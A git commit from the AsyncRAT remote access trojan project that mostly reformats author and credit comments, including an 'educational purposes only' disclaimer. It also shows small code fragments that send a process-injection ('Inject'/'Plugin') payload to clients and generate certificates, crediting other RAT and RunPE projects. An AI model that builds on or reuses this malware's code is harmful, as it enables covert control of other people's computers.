Update project comments

This commit is contained in:
NYAN CAT 2019-06-09 06:50:58 +03:00
parent ca0020699f
commit 2c2c38bccc
4 changed files with 20 additions and 30 deletions

View File

@ -17,17 +17,13 @@ using AsyncRAT_Sharp.Helper;
using System.Security.Cryptography.X509Certificates;
using System.Collections.Generic;
// │ Author : NYAN CAT
// │ Name : AsyncRAT // Simple RAT
/*
Author : NYAN CAT
Name : AsyncRAT Simple RAT
Contact Me : https:github.com/NYAN-x-CAT
// Contact Me : https://github.com/NYAN-x-CAT
// This program Is distributed for educational purposes only.
// Credits;
// Serialization @ymofen
// StreamLibrary @Dergan
// Special Thanks MaxXor@hf gigajew@hf
This program Is distributed for educational purposes only.
*/
namespace AsyncRAT_Sharp
{
@ -467,6 +463,7 @@ namespace AsyncRAT_Sharp
{
msgpack.ForcePathObject("Inject").AsString = formSend.comboBox2.Text;
msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.Plugin);
// github.com/gigajew/WinXRunPE-x86_x64
}
foreach (ListViewItem itm in listView1.SelectedItems)

View File

@ -45,6 +45,7 @@ namespace AsyncRAT_Sharp.Forms
public static X509Certificate2 CreateCertificate(string certName, X509Certificate2 ca, int keyStrength)
{
// github.com/quasar/QuasarRAT/blob/master/Quasar.Server/Helper/CertificateHelper.cs
var caCert = DotNetUtilities.FromX509Certificate(ca);
var random = new SecureRandom(new CryptoApiRandomGenerator());
var keyPairGen = new RsaKeyPairGenerator();

View File

@ -4,17 +4,13 @@ using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
// │ Author : NYAN CAT
// │ Name : AsyncRAT // Simple RAT
/*
Author : NYAN CAT
Name : AsyncRAT Simple RAT
Contact Me : https:github.com/NYAN-x-CAT
// Contact Me : https://github.com/NYAN-x-CAT
// This program Is distributed for educational purposes only.
// Credits;
// Serialization @ymofen
// StreamLibrary @Dergan
// Special Thanks MaxXor@hf gigajew@hf
This program Is distributed for educational purposes only.
*/
namespace AsyncRAT_Sharp
{

View File

@ -4,17 +4,13 @@ using Client.Install;
using System;
using Client.Helper;
// │ Author : NYAN CAT
// │ Name : AsyncRAT // Simple RAT
/*
Author : NYAN CAT
Name : AsyncRAT Simple RAT
Contact Me : https:github.com/NYAN-x-CAT
// Contact Me : https://github.com/NYAN-x-CAT
// This program Is distributed for educational purposes only.
// Credits;
// Serialization @ymofen
// StreamLibrary @Dergan
// Special Thanks MaxXor@hf gigajew@hf
This program Is distributed for educational purposes only.
*/
namespace Client
{